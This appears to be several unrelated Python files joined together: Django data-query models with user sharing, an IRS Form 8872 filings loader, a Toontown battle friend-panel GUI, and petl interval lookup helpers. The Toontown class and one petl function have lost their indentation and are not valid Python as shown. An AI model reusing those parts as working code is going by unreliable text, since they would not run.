                                "keyword argument 'json'"
                                .format(self.__class__.__name__))
            args = list(args)
            kwargs['json'] = args.pop(0)
        super(DataView, self).__init__(*args, **kwargs)

    def __unicode__(self):
        toks = []

        # Identifier: first non-empty of name, user, session key, pk
        if self.name:
            toks.append(self.name)
        elif self.user_id:
            toks.append(unicode(self.user))
        elif self.session_key:
            toks.append(self.session_key)
        elif self.pk:
            toks.append('#{0}'.format(self.pk))
        else:
            toks.append('unsaved')

        # State
        if self.default:
            toks.append('default template')
        elif self.template:
            toks.append('template')
        elif self.session:
            toks.append('session')
        else:
            toks.append('rogue')

        return u'{0} ({1})'.format(*toks)

    @classmethod
    def validate(cls, attrs, **context):
        "Validates `attrs` as a view."
        return parsers.dataview.validate(attrs, **context)

    def parse(self, tree=None, **context):
        "Returns a parsed node for this view."
        return parsers.dataview.parse(self.json, tree=tree, **context)

    def apply(self, queryset=None, tree=None, include_pk=True, **context):
        "Applies this view to a QuerySet."
        if tree is None and queryset is not None:
            tree = queryset.model
        return self.parse(tree=tree, **context) \
            .apply(queryset=queryset, include_pk=include_pk)

    def clean(self):
        from django.core.exceptions import ValidationError
        # Enforce at most one default template across all views.
        if self.template and self.default:
            queryset = self.__class__.objects.filter(template=True,
                                                     default=True)
            if self.pk:
                queryset = queryset.exclude(pk=self.pk)

            if queryset.exists():
                raise ValidationError('Only one default template can be '
                                      'defined')

    def save(self, *args, **kwargs):
        self.clean()
        # BUGFIX: was `super(self.__class__, self)`, which recurses
        # infinitely if DataView is ever subclassed; name the class.
        super(DataView, self).save(*args, **kwargs)
class DataQuery(Base):
    """
    JSON object representing a complete query.

    The query is constructed from a context (providing the 'WHERE' statements)
    and a view (providing the 'SELECT' and 'ORDER BY' statements). This
    corresponds to all the statements of the SQL query to dictate what info
    to retrieve, how to filter it, and the order to display it in.
    """
    session = models.BooleanField(default=False)
    template = models.BooleanField(default=False)
    default = models.BooleanField(default=False)

    # The parent this instance was derived from
    parent = models.ForeignKey('self', null=True, blank=True,
                               related_name='forks')

    # For authenticated users the `user` can be directly referenced,
    # otherwise the session key can be used.
    user = models.ForeignKey(User, null=True, blank=True,
                             related_name='dataquery+')
    session_key = models.CharField(max_length=40, null=True, blank=True)
    accessed = models.DateTimeField(default=datetime.now, editable=False)

    objects = managers.DataQueryManager()

    shared_users = models.ManyToManyField(User,
                                          related_name='shareddataquery+')

    # Flag indicating whether this is a public query or not. Public queries are
    # visible to all other users of the system while non-public queries are
    # only visible to the query owner and those in the shared_users collection.
    public = models.BooleanField(default=False)

    context_json = jsonfield.JSONField(
        null=True, blank=True, default=dict,
        validators=[parsers.datacontext.validate])
    view_json = jsonfield.JSONField(
        null=True, blank=True, default=dict,
        validators=[parsers.dataview.validate])

    class Meta(object):
        verbose_name_plural = 'data queries'

    def __init__(self, *args, **kwargs):
        # Allow a positional dict with 'context'/'view' keys to stand in for
        # the `context_json`/`view_json` keywords.
        if args and isinstance(args[0], dict):
            data = args[0]
            args = args[1:]

            if 'context_json' in kwargs:
                raise TypeError("{0}.__init__() got multiple values for "
                                "keyword argument 'context_json'"
                                .format(self.__class__.__name__))
            if 'view_json' in kwargs:
                raise TypeError("{0}.__init__() got multiple values for "
                                "keyword argument 'view_json'"
                                .format(self.__class__.__name__))

            kwargs['context_json'] = data.get('context')
            kwargs['view_json'] = data.get('view')
        super(DataQuery, self).__init__(*args, **kwargs)

    def __unicode__(self):
        toks = []

        # Identifier: first non-empty of name, user, session key, pk
        if self.name:
            toks.append(self.name)
        elif self.user_id:
            toks.append(unicode(self.user))
        elif self.session_key:
            toks.append(self.session_key)
        elif self.pk:
            toks.append('#{0}'.format(self.pk))
        else:
            toks.append('unsaved')

        # State
        if self.default:
            toks.append('default template')
        elif self.template:
            toks.append('template')
        elif self.session:
            toks.append('session')
        else:
            toks.append('rogue')

        return u'{0} ({1})'.format(*toks)

    @property
    def context(self):
        "Returns an unsaved DataContext wrapping `context_json`."
        # An inverse pk is used to prevent colliding with saved instances.
        # A pk is necessary for proper cache key formation.
        pk = -self.pk if self.pk else None
        return DataContext(pk=pk, json=self.context_json)

    @property
    def view(self):
        "Returns an unsaved DataView wrapping `view_json`."
        # An inverse pk is used to prevent colliding with saved instances.
        # A pk is necessary for proper cache key formation.
        pk = -self.pk if self.pk else None
        return DataView(pk=pk, json=self.view_json)

    @property
    def json(self):
        return {
            'context': self.context_json,
            'view': self.view_json
        }

    @classmethod
    def validate(cls, attrs, **context):
        "Validates `attrs` as a query."
        return parsers.dataquery.validate(attrs, **context)

    @cached_method(version='modified')
    def count(self, *args, **kwargs):
        "Returns the number of rows matched by this query."
        return self.apply(*args, **kwargs).count()

    def parse(self, tree=None, **context):
        "Returns a parsed node for this query."
        json = {
            'context': self.context_json,
            'view': self.view_json,
        }
        return parsers.dataquery.parse(json, tree=tree, **context)

    def apply(self, queryset=None, tree=None, distinct=True, include_pk=True,
              **context):
        "Applies this query to a QuerySet."
        if tree is None and queryset is not None:
            tree = queryset.model
        return self.parse(tree=tree, **context) \
            .apply(queryset=queryset, distinct=distinct, include_pk=include_pk)

    def clean(self):
        from django.core.exceptions import ValidationError
        # Enforce at most one default template across all queries.
        if self.template and self.default:
            queryset = self.__class__.objects.filter(template=True,
                                                     default=True)
            if self.pk:
                queryset = queryset.exclude(pk=self.pk)

            if queryset.exists():
                raise ValidationError('Only one default template can be '
                                      'defined')

    def save(self, *args, **kwargs):
        self.clean()
        # BUGFIX: was `super(self.__class__, self)`, which recurses
        # infinitely if DataQuery is ever subclassed; name the class.
        super(DataQuery, self).save(*args, **kwargs)

    def share_with_user(self, username_or_email, create_user=True):
        """
        Attempts to add a user with the supplied email address or username
        to the list of shared users for this query. If create_user is set to
        True, users will be created for emails that are not already associated
        with an existing user. New users are not created for a provided
        username if it cannot be found.

        Returns True if the email/username was added to the list of shared
        users and False if the email/username wasn't added because it already
        exists or wasn't created.
        """
        # If both share settings are set to false, nothing can be done
        if not settings.SHARE_BY_USERNAME and not settings.SHARE_BY_EMAIL:
            log.warning('Cannot share with any user because SHARE_BY_USERNAME'
                        ' and SHARE_BY_EMAIL are both set to False.')
            return False

        # If the query is already shared then there is no need to share it
        # again.
        if self.shared_users.filter(
                Q(email__iexact=username_or_email) |
                Q(username__iexact=username_or_email)).exists():
            return False

        user = None

        # Create a Q() object to build our query
        q = Q()
        if settings.SHARE_BY_USERNAME:
            if settings.SHARE_BY_USERNAME_CASE_SENSITIVE:
                q |= Q(username=username_or_email)
            else:
                q |= Q(username__iexact=username_or_email)
        if settings.SHARE_BY_EMAIL:
            q |= Q(email__iexact=username_or_email)

        # Try to retrieve a user. If this fails, create a new user with the
        # email address
        try:
            user = User.objects.get(q)
        except User.DoesNotExist:
            log.warning('Cannot find user "{0}".'.format(username_or_email))

        if not user and create_user:
            try:
                user = utils.create_email_based_user(username_or_email)
            except ValidationError:
                log.warning('Could not create user with email. "{0}" is not a '
                            'valid email.'.format(username_or_email))

        # If a user was found/created, add that user to shared users
        if user:
            self.shared_users.add(user)
            self.save()
            return True

        return False
# Register instance-level cache invalidation handlers so per-instance
# cached methods are flushed when metadata rows change or are removed.
post_save.connect(post_save_cache, sender=DataField)
post_save.connect(post_save_cache, sender=DataConcept)
post_save.connect(post_save_cache, sender=DataCategory)
pre_delete.connect(pre_delete_uncache, sender=DataField)
pre_delete.connect(pre_delete_uncache, sender=DataConcept)
pre_delete.connect(pre_delete_uncache, sender=DataCategory)

# Register with history API
# NOTE(review): registration runs at import time; assumes
# settings.HISTORY_ENABLED is final when this module is first imported.
if settings.HISTORY_ENABLED:
    history.register(DataContext, fields=('name', 'description', 'json'))
    history.register(DataView, fields=('name', 'description', 'json'))
    history.register(DataQuery, fields=('name', 'description', 'context_json',
                                        'view_json'))
| |
import os
import csv
import shutil
import zipfile
import requests
import string
from decimal import Decimal
from datetime import datetime
from django.conf import settings
from django.core.management.base import BaseCommand
from irs.models import F8872, Contribution, Expenditure, Committee
# These are terms in the raw data that don't actually mean anything
# (including misspellings observed in filings); cells matching one of these
# after normalization are stored as NULL.
NULL_TERMS = [
    'N/A',
    'NOT APPLICABLE',
    'NA',
    'NONE',
    'NOT APPLICABE',
    'NOT APLICABLE',
    'N A',
    'N-A']

# Accumulators for bulk_create batching (flushed by Command.handle).
CONTRIBUTIONS = []
EXPENDITURES = []

# Running list of filing ids so we don't add contributions or expenditures
# without an associated filing
PARSED_FILING_IDS = set()
class RowParser:
    """
    Takes a row from the raw data and a mapping of field
    positions to field names in order to clean and save the
    row to the database.

    Instantiating the parser immediately parses the row and creates the
    corresponding model object (side effect in __init__).
    """

    def __init__(self, form_type, mapping, row):
        # form_type: '2' = F8872 filing, 'A' = contribution,
        # 'B' = expenditure. mapping: position -> (field_name, field_type).
        self.form_type = form_type
        self.mapping = mapping
        self.row = row
        self.parsed_row = {}
        self.parse_row()
        self.create_object()

    def clean_cell(self, cell, cell_type):
        """
        Uses the type of field (from the mapping) to
        determine how to clean and format the cell.

        Returns None for empty, null-term or unparseable cells.
        """
        try:
            # Get rid of non-ASCII characters
            cell = cell.encode('ascii', 'ignore').decode()
            if cell_type == 'D':
                # Dates are formatted as YYYYMMDD in the raw feed.
                cell = datetime.strptime(cell, '%Y%m%d')
            elif cell_type == 'I':
                cell = int(cell)
            elif cell_type == 'N':
                cell = Decimal(cell)
            else:
                # Free text: normalize case and truncate to the models'
                # 50-character column limit.
                cell = cell.upper()
                if len(cell) > 50:
                    cell = cell[0:50]
                if not cell or cell in NULL_TERMS:
                    cell = None
        # BUGFIX: was a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit. Any parse failure nulls the cell.
        except Exception:
            cell = None
        return cell

    def parse_row(self):
        """
        Parses a row, cell-by-cell, returning a dict of field names
        to the cleaned field values.
        """
        fields = self.mapping
        for i, cell in enumerate(self.row[0:len(fields)]):
            field_name, field_type = fields[str(i)]
            parsed_cell = self.clean_cell(cell, field_type)
            self.parsed_row[field_name] = parsed_cell

    def create_contribution(self):
        "Queues a Contribution for bulk creation."
        contribution = Contribution(**self.parsed_row)
        # If there's no filing in the database for this contribution
        if contribution.form_id_number not in PARSED_FILING_IDS:
            # Skip this contribution
            return
        contribution.filing_id = contribution.form_id_number
        contribution.committee_id = contribution.EIN
        CONTRIBUTIONS.append(contribution)

    def create_object(self):
        "Dispatches on form type to queue or save the parsed record."
        if self.form_type == 'A':
            self.create_contribution()
        elif self.form_type == 'B':
            expenditure = Expenditure(**self.parsed_row)
            # If there's no filing in the database for this expenditure
            if expenditure.form_id_number not in PARSED_FILING_IDS:
                # Skip this expenditure
                return
            expenditure.filing_id = expenditure.form_id_number
            expenditure.committee_id = expenditure.EIN
            EXPENDITURES.append(expenditure)
        elif self.form_type == '2':
            # Filings are saved immediately so later contribution and
            # expenditure rows can be validated against PARSED_FILING_IDS.
            filing = F8872(**self.parsed_row)
            PARSED_FILING_IDS.add(filing.form_id_number)
            print('Parsing filing {}'.format(filing.form_id_number))
            committee, created = Committee.objects.get_or_create(
                EIN=filing.EIN)
            if created:
                committee.name = filing.organization_name
                committee.save()
            filing.committee = committee
            filing.save()
class Command(BaseCommand):
    help = "Download the latest IRS filings and load them into the database"

    def add_arguments(self, parser):
        parser.add_argument(
            '--test',
            action='store_true',
            dest='test',
            default=False,
            help='Use a subset of data for testing',
        )

    def handle(self, *args, **options):
        # Create a temporary data directory
        self.data_dir = os.path.join(
            settings.BASE_DIR,
            'data')
        if not os.path.exists(self.data_dir):
            os.makedirs(self.data_dir)
        # Where to download the raw zipped archive
        self.zip_path = os.path.join(
            self.data_dir,
            'zipped_archive.zip')
        # Where to extract the archive
        self.extract_path = os.path.join(
            self.data_dir)
        # Where to store the data file
        self.final_path = os.path.join(
            self.data_dir,
            'FullDataFile.txt')

        # Full reload: wipe everything before parsing the new archive.
        print('Flushing database')
        F8872.objects.all().delete()
        Contribution.objects.all().delete()
        Expenditure.objects.all().delete()
        Committee.objects.all().delete()

        if options['test']:
            print('Using test data file')
            self.final_path = os.path.join(
                os.path.dirname(
                    os.path.dirname(
                        os.path.dirname(__file__))),
                'tests',
                'TestDataFile.txt')
        else:
            print('Downloading latest archive')
            self.download()
            self.unzip()
            self.clean()

        print('Parsing archive')
        self.build_mappings()
        global CONTRIBUTIONS
        global EXPENDITURES
        with open(self.final_path, 'r') as raw_file:
            reader = csv.reader(raw_file, delimiter='|')
            for row in reader:
                # Flush accumulators in batches to bound memory usage.
                if len(CONTRIBUTIONS) > 5000:
                    Contribution.objects.bulk_create(CONTRIBUTIONS)
                    CONTRIBUTIONS = []
                if len(EXPENDITURES) > 5000:
                    Expenditure.objects.bulk_create(EXPENDITURES)
                    EXPENDITURES = []
                try:
                    form_type = row[0]
                    if form_type == '2':
                        RowParser(form_type, self.mappings['F8872'], row)
                    elif form_type == 'A':
                        RowParser(form_type, self.mappings['sa'], row)
                    elif form_type == 'B':
                        RowParser(form_type, self.mappings['sb'], row)
                except IndexError:
                    # Blank or short rows are expected in the raw feed.
                    pass

        # BUGFIX: flush the final partial batches. Previously any trailing
        # records (fewer than 5000) accumulated after the last in-loop flush
        # were silently dropped.
        if CONTRIBUTIONS:
            Contribution.objects.bulk_create(CONTRIBUTIONS)
            CONTRIBUTIONS = []
        if EXPENDITURES:
            Expenditure.objects.bulk_create(EXPENDITURES)
            EXPENDITURES = []

        print('Resolving amendments')
        # Mark every earlier filing for the same committee/period as amended
        # by the newest (highest form_id_number) amendment.
        for filing in F8872.objects.filter(amended_report_indicator=1):
            previous_filings = F8872.objects.filter(
                committee_id=filing.EIN,
                begin_date=filing.begin_date,
                end_date=filing.end_date,
                form_id_number__lt=filing.form_id_number)
            previous_filings.update(
                is_amended=True,
                amended_by_id=filing.form_id_number)

        # Delete the data directory
        shutil.rmtree(os.path.join(self.data_dir))

    def download(self):
        """
        Download the archive from the IRS website.
        """
        print('Starting download')
        url = 'http://forms.irs.gov/app/pod/dataDownload/fullData'
        r = requests.get(url, stream=True)
        with open(self.zip_path, 'wb') as f:
            # This is a big file, so we download in chunks
            for chunk in r.iter_content(chunk_size=30720):
                print('Downloading...')
                f.write(chunk)
                f.flush()

    def unzip(self):
        """
        Unzip the archive.
        """
        print('Unzipping archive')
        with zipfile.ZipFile(self.zip_path, 'r') as zipped_archive:
            data_file = zipped_archive.namelist()[0]
            zipped_archive.extract(data_file, self.extract_path)

    def clean(self):
        """
        Get the .txt file from within the many-layered
        directory structure, then delete the directories.
        """
        print('Cleaning up archive')
        shutil.move(
            os.path.join(
                self.data_dir,
                'var/IRS/data/scripts/pofd/download/FullDataFile.txt'
            ),
            self.final_path
        )
        shutil.rmtree(os.path.join(self.data_dir, 'var'))
        os.remove(self.zip_path)

    def build_mappings(self):
        """
        Uses CSV files of field names and positions for
        different filing types to load mappings into memory,
        for use in parsing different types of rows.
        """
        self.mappings = {}
        for record_type in ('sa', 'sb', 'F8872'):
            path = os.path.join(
                os.path.dirname(
                    os.path.dirname(
                        os.path.dirname(__file__))),
                'mappings',
                '{}.csv'.format(record_type))
            mapping = {}
            with open(path, 'r') as csvfile:
                reader = csv.DictReader(csvfile)
                for row in reader:
                    # position -> (model field name, field type code)
                    mapping[row['position']] = (
                        row['model_name'],
                        row['field_type'])
            self.mappings[record_type] = mapping
| |
from pandac.PandaModules import *
from toontown.toonbase.ToontownGlobals import *
from direct.gui.DirectGui import *
from pandac.PandaModules import *
from direct.showbase import DirectObject
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import StateData
from toontown.toonbase import ToontownGlobals
from toontown.toonbase import TTLocalizer
import types
from toontown.toon import NPCToons
from toontown.toon import NPCFriendPanel
from toontown.toonbase import ToontownBattleGlobals
class TownBattleSOSPanel(DirectFrame, StateData.StateData):
notify = DirectNotifyGlobal.directNotify.newCategory('TownBattleSOSPanel')
def __init__(self, doneEvent):
DirectFrame.__init__(self, relief=None)
self.initialiseoptions(TownBattleSOSPanel)
StateData.StateData.__init__(self, doneEvent)
self.friends = {}
self.NPCFriends = {}
self.textRolloverColor = Vec4(1, 1, 0, 1)
self.textDownColor = Vec4(0.5, 0.9, 1, 1)
self.textDisabledColor = Vec4(0.4, 0.8, 0.4, 1)
self.bldg = 0
self.chosenNPCToons = []
return
def load(self):
if self.isLoaded == 1:
return None
self.isLoaded = 1
bgd = loader.loadModel('phase_3.5/models/gui/frame')
gui = loader.loadModel('phase_3.5/models/gui/frame4names')
scrollGui = loader.loadModel('phase_3.5/models/gui/friendslist_gui')
backGui = loader.loadModel('phase_3.5/models/gui/battle_gui')
self['image'] = bgd
self['image_pos'] = (0.0, 0.1, -0.08)
self.setScale(0.3)
self.title = DirectLabel(parent=self, relief=None, text=TTLocalizer.TownBattleSOSNoFriends, text_scale=0.4, text_fg=(1, 1, 1, 1), text_shadow=(0, 0, 0, 1), pos=(0.0, 0.0, 1.5))
self.NPCFriendPanel = NPCFriendPanel.NPCFriendPanel(parent=self, doneEvent=self.doneEvent)
self.NPCFriendPanel.setPos(-0.75, 0, -0.15)
self.NPCFriendPanel.setScale(0.325)
self.NPCFriendsLabel = DirectLabel(parent=self, relief=None, text=TTLocalizer.TownBattleSOSNPCFriends, text_scale=0.3, text_fg=(1, 1, 1, 1), text_shadow=(0, 0, 0, 1), pos=(-0.75, 0.0, -2.0))
self.scrollList = DirectScrolledList(parent=self, relief=None, image=gui.find('**/frame4names'), image_scale=(0.11, 1, 0.1), text=TTLocalizer.FriendsListPanelOnlineFriends, text_scale=0.04, text_pos=(-0.02, 0.275), text_fg=(0, 0, 0, 1), incButton_image=(scrollGui.find('**/FndsLst_ScrollUp'),
scrollGui.find('**/FndsLst_ScrollDN'),
scrollGui.find('**/FndsLst_ScrollUp_Rllvr'),
scrollGui.find('**/FndsLst_ScrollUp')), incButton_relief=None, incButton_pos=(0.0, 0.0, -0.3), incButton_image3_color=Vec4(0.6, 0.6, 0.6, 0.6), incButton_scale=(1.0, 1.0, -1.0), decButton_image=(scrollGui.find('**/FndsLst_ScrollUp'),
scrollGui.find('**/FndsLst_ScrollDN'),
scrollGui.find('**/FndsLst_ScrollUp_Rllvr'),
scrollGui.find('**/FndsLst_ScrollUp')), decButton_relief=None, decButton_pos=(0.0, 0.0, 0.175), decButton_image3_color=Vec4(0.6, 0.6, 0.6, 0.6), itemFrame_pos=(-0.17, 0.0, 0.11), itemFrame_relief=None, numItemsVisible=9, items=[], pos=(2.4, 0.0, 0.025), scale=3.5)
clipper = PlaneNode('clipper')
clipper.setPlane(Plane(Vec3(-1, 0, 0), Point3(0.32, 0, 0)))
clipNP = self.scrollList.component('itemFrame').attachNewNode(clipper)
self.scrollList.component('itemFrame').setClipPlane(clipNP)
self.close = DirectButton(parent=self, relief=None, image=(backGui.find('**/PckMn_BackBtn'), backGui.find('**/PckMn_BackBtn_Dn'), backGui.find('**/PckMn_BackBtn_Rlvr')), pos=(2.3, 0.0, -1.65), scale=3, text=TTLocalizer.TownBattleSOSBack, text_scale=0.05, text_pos=(0.01, -0.012), text_fg=Vec4(0, 0, 0.8, 1), command=self.__close)
gui.removeNode()
scrollGui.removeNode()
backGui.removeNode()
bgd.removeNode()
self.hide()
return
def unload(self):
if self.isLoaded == 0:
return None
self.isLoaded = 0
self.exit()
del self.title
del self.scrollList
del self.close
del self.friends
del self.NPCFriends
DirectFrame.destroy(self)
return None
def makeFriendButton(self, friendPair):
friendId, flags = friendPair
handle = base.cr.playerFriendsManager.identifyFriend(friendId)
if handle == None:
base.cr.fillUpFriendsMap()
return
friendName = handle.getName()
fg = Vec4(0.0, 0.0, 0.0, 1.0)
if handle.isPet():
com = self.__chosePet
else:
com = self.__choseFriend
return DirectButton(relief=None, text=friendName, text_scale=0.04, text_align=TextNode.ALeft, text_fg=fg, text1_bg=self.textDownColor, text2_bg=self.textRolloverColor, text3_fg=self.textDisabledColor, command=com, extraArgs=[friendId, friendName])
def makeNPCFriendButton(self, NPCFriendId, numCalls):
if NPCFriendId not in TTLocalizer.NPCToonNames:
return None
friendName = TTLocalizer.NPCToonNames[NPCFriendId]
friendName += ' %d' % numCalls
fg = Vec4(0.0, 0.0, 0.0, 1.0)
return DirectButton(relief=None, text=friendName, text_scale=0.04, text_align=TextNode.ALeft, text_fg=fg, text1_bg=self.textDownColor, text2_bg=self.textRolloverColor, text3_fg=self.textDisabledColor, command=self.__choseNPCFriend, extraArgs=[NPCFriendId])
def enter(self, canLure = 1, canTrap = 1):
if self.isEntered == 1:
return None
self.isEntered = 1
if self.isLoaded == 0:
self.load()
self.canLure = canLure
self.canTrap = canTrap
self.factoryToonIdList = None
messenger.send('SOSPanelEnter', [self])
self.__updateScrollList()
self.__updateNPCFriendsPanel()
self.__updateTitleText()
self.show()
self.accept('friendOnline', self.__friendOnline)
self.accept('friendOffline', self.__friendOffline)
self.accept('friendsListChanged', self.__friendsListChanged)
self.accept('friendsMapComplete', self.__friendsListChanged)
return
def exit(self):
if self.isEntered == 0:
return None
self.isEntered = 0
self.hide()
self.ignore('friendOnline')
self.ignore('friendOffline')
self.ignore('friendsListChanged')
self.ignore('friendsMapComplete')
messenger.send(self.doneEvent)
return None
def __close(self):
doneStatus = {}
doneStatus['mode'] = 'Back'
messenger.send(self.doneEvent, [doneStatus])
def __choseFriend(self, friendId, friendName):
doneStatus = {}
doneStatus['mode'] = 'Friend'
doneStatus['friend'] = friendId
messenger.send(self.doneEvent, [doneStatus])
def __chosePet(self, petId, petName):
doneStatus = {}
doneStatus['mode'] = 'Pet'
doneStatus['petId'] = petId
doneStatus['petName'] = petName
messenger.send(self.doneEvent, [doneStatus])
def __choseNPCFriend(self, friendId):
doneStatus = {}
doneStatus['mode'] = 'NPCFriend'
doneStatus['friend'] = friendId
self.chosenNPCToons.append(friendId)
messenger.send(self.doneEvent, [doneStatus])
def setFactoryToonIdList(self, toonIdList):
self.factoryToonIdList = toonIdList[:]
def __updateScrollList(self):
newFriends = []
battlePets = base.config.GetBool('want-pets-in-battle', 1)
if base.wantPets and battlePets == 1 and base.localAvatar.hasPet():
newFriends.append((base.localAvatar.getPetId(), 0))
if not self.bldg or self.factoryToonIdList is not None:
for friendPair in base.localAvatar.friendsList:
if base.cr.isFriendOnline(friendPair[0]):
if self.factoryToonIdList is None or friendPair[0] in self.factoryToonIdList:
newFriends.append(friendPair)
if hasattr(base.cr, 'playerFriendsManager'):
for avatarId in base.cr.playerFriendsManager.getAllOnlinePlayerAvatars():
if not base.cr.playerFriendsManager.askAvatarKnownElseWhere(avatarId):
newFriends.append((avatarId, 0))
for friendPair in self.friends.keys():
if friendPair not in newFriends:
friendButton = self.friends[friendPair]
self.scrollList.removeItem(friendButton)
if not friendButton.isEmpty():
friendButton.destroy()
del self.friends[friendPair]
for friendPair in newFriends:
if friendPair not in self.friends:
friendButton = self.makeFriendButton(friendPair)
if friendButton:
self.scrollList.addItem(friendButton)
self.friends[friendPair] = friendButton
return
def __updateNPCFriendsPanel(self):
self.NPCFriends = {}
for friend, count in base.localAvatar.NPCFriendsDict.items():
track = NPCToons.getNPCTrack(friend)
if track == ToontownBattleGlobals.LURE_TRACK and self.canLure == 0 or track == ToontownBattleGlobals.TRAP_TRACK and self.canTrap == 0:
self.NPCFriends[friend] = 0
else:
self.NPCFriends[friend] = count
self.NPCFriendPanel.update(self.NPCFriends, fCallable=1)
def __updateTitleText(self):
isEmpty = (len(self.friends) == 0 and len(self.NPCFriends) == 0)
if isEmpty:
self.title['text'] = TTLocalizer.TownBattleSOSNoFriends
else:
self.title['text'] = TTLocalizer.TownBattleSOSWhichFriend
    def __friendOnline(self, doId, commonChatFlags, whitelistChatFlags):
        # Event handler: a friend came online; refresh list and title.
        self.__updateScrollList()
        self.__updateTitleText()
    def __friendOffline(self, doId):
        # Event handler: a friend went offline; refresh list and title.
        self.__updateScrollList()
        self.__updateTitleText()
    def __friendsListChanged(self):
        # Event handler: friends list membership changed; refresh display.
        self.__updateScrollList()
        self.__updateTitleText()
| |
from __future__ import absolute_import, print_function, division
from operator import itemgetter, attrgetter
from petl.compat import text_type
from petl.util.base import asindices, records, Table, values, rowgroupby
from petl.errors import DuplicateKeyError
from petl.transform.basics import addfield
from petl.transform.sorts import sort
def tupletree(table, start='start', stop='stop', value=None):
    """
    Build an intervaltree.IntervalTree whose intervals come from the rows of
    `table`, keyed on the `start` and `stop` fields.  Each interval's data
    payload is the whole row as a tuple, or the `value` field(s) when
    `value` is given.
    """
    import intervaltree
    rows = iter(table)
    hdr = next(rows)
    fields = [text_type(f) for f in hdr]
    assert start in fields, 'start field not recognised'
    assert stop in fields, 'stop field not recognised'
    startidx = fields.index(start)
    stopidx = fields.index(stop)
    if value is None:
        getvalue = tuple
    else:
        valueindices = asindices(hdr, value)
        assert len(valueindices) > 0, 'invalid value field specification'
        getvalue = itemgetter(*valueindices)
    tree = intervaltree.IntervalTree()
    for row in rows:
        tree.addi(row[startidx], row[stopidx], getvalue(row))
    return tree
def facettupletrees(table, key, start='start', stop='stop', value=None):
    """
    Build one interval tree per distinct `key` value, returned as a dict
    mapping key -> intervaltree.IntervalTree.  Interval payloads are whole
    rows as tuples, or the `value` field(s) when `value` is given.
    """
    import intervaltree
    rows = iter(table)
    hdr = next(rows)
    fields = [text_type(f) for f in hdr]
    assert start in fields, 'start field not recognised'
    assert stop in fields, 'stop field not recognised'
    getstart = itemgetter(fields.index(start))
    getstop = itemgetter(fields.index(stop))
    if value is None:
        getvalue = tuple
    else:
        valueindices = asindices(hdr, value)
        assert len(valueindices) > 0, 'invalid value field specification'
        getvalue = itemgetter(*valueindices)
    keyindices = asindices(hdr, key)
    assert len(keyindices) > 0, 'invalid key'
    getkey = itemgetter(*keyindices)
    trees = {}
    for row in rows:
        k = getkey(row)
        tree = trees.get(k)
        if tree is None:
            tree = trees[k] = intervaltree.IntervalTree()
        tree.addi(getstart(row), getstop(row), getvalue(row))
    return trees
def recordtree(table, start='start', stop='stop'):
    """
    Build an interval tree over `table` where each interval's payload is
    the corresponding row as a record object.
    """
    import intervaltree
    startattr = attrgetter(start)
    stopattr = attrgetter(stop)
    tree = intervaltree.IntervalTree()
    for rec in records(table):
        tree.addi(startattr(rec), stopattr(rec), rec)
    return tree
def facetrecordtrees(table, key, start='start', stop='stop'):
    """
    Build one interval tree of records per distinct `key` value; returns a
    dict mapping key -> intervaltree.IntervalTree.
    """
    import intervaltree
    startattr = attrgetter(start)
    stopattr = attrgetter(stop)
    keyattr = attrgetter(key)
    trees = {}
    for rec in records(table):
        k = keyattr(rec)
        tree = trees.get(k)
        if tree is None:
            tree = trees[k] = intervaltree.IntervalTree()
        tree.addi(startattr(rec), stopattr(rec), rec)
    return trees
def intervallookup(table, start='start', stop='stop', value=None,
                   include_stop=False):
    """
    Construct an interval lookup for the given table.

    Returns an IntervalTreeLookup whose ``search(start, stop=None)`` method
    returns the rows (as tuples, or as the `value` field(s) when `value` is
    given) whose intervals overlap the query range; ``search(point)``
    performs a point query.  Start coordinates are included and stop
    coordinates are excluded from each interval; pass ``include_stop=True``
    to also match intervals sharing an endpoint with the query.
    """
    return IntervalTreeLookup(
        tupletree(table, start=start, stop=stop, value=value),
        include_stop=include_stop)


Table.intervallookup = intervallookup
def _search_tree(tree, start, stop, include_stop):
if stop is None:
if include_stop:
stop = start + 1
start -= 1
args = (start, stop)
else:
args = (start,)
else:
if include_stop:
stop += 1
start -= 1
args = (start, stop)
results = sorted(tree.search(*args))
return results
class IntervalTreeLookup(object):
    """Query helper over an interval tree; search returns data payloads."""

    def __init__(self, tree, include_stop=False):
        self.tree = tree
        self.include_stop = include_stop

    def search(self, start, stop=None):
        matches = _search_tree(self.tree, start, stop, self.include_stop)
        return [m.data for m in matches]

    find = search
def intervallookupone(table, start='start', stop='stop', value=None,
                      include_stop=False, strict=True):
    """
    Construct an interval lookup for the given table, returning at most one
    result for each query.

    With ``strict=True`` a query matching more than one interval raises a
    `DuplicateKeyError`; with ``strict=False`` the first match is returned.
    A query with no match returns None.  Start coordinates are included and
    stop coordinates are excluded from each interval; pass
    ``include_stop=True`` to include the upper bound when finding overlaps.
    """
    return IntervalTreeLookupOne(
        tupletree(table, start=start, stop=stop, value=value),
        strict=strict, include_stop=include_stop)


Table.intervallookupone = intervallookupone
class IntervalTreeLookupOne(object):
    """Like IntervalTreeLookup but yields a single payload per query.

    With strict=True a query matching more than one interval raises
    DuplicateKeyError; otherwise the first match (in sorted order) wins.
    No match returns None.
    """

    def __init__(self, tree, strict=True, include_stop=False):
        self.tree = tree
        self.strict = strict
        self.include_stop = include_stop

    def search(self, start, stop=None):
        matches = _search_tree(self.tree, start, stop, self.include_stop)
        if not matches:
            return None
        if self.strict and len(matches) > 1:
            raise DuplicateKeyError((start, stop))
        return matches[0].data

    find = search
def intervalrecordlookup(table, start='start', stop='stop', include_stop=False):
    """
    As :func:`petl.transform.intervals.intervallookup` but return records
    instead of tuples.
    """
    return IntervalTreeLookup(recordtree(table, start=start, stop=stop),
                              include_stop=include_stop)


Table.intervalrecordlookup = intervalrecordlookup
def intervalrecordlookupone(table, start='start', stop='stop',
                            include_stop=False, strict=True):
    """
    As :func:`petl.transform.intervals.intervallookupone` but return records
    instead of tuples.
    """
    return IntervalTreeLookupOne(recordtree(table, start=start, stop=stop),
                                 include_stop=include_stop, strict=strict)


Table.intervalrecordlookupone = intervalrecordlookupone
def facetintervallookup(table, key, start='start', stop='stop',
                        value=None, include_stop=False):
    """
    Construct a faceted interval lookup for the given table.

    Returns a dict mapping each distinct `key` value to an
    IntervalTreeLookup over the rows sharing that key, so queries look
    like ``lkp['apple'].search(1, 2)``.  Start coordinates are included
    and stop coordinates are excluded from each interval; pass
    ``include_stop=True`` to include the upper bound when finding overlaps.
    """
    trees = facettupletrees(table, key, start=start, stop=stop, value=value)
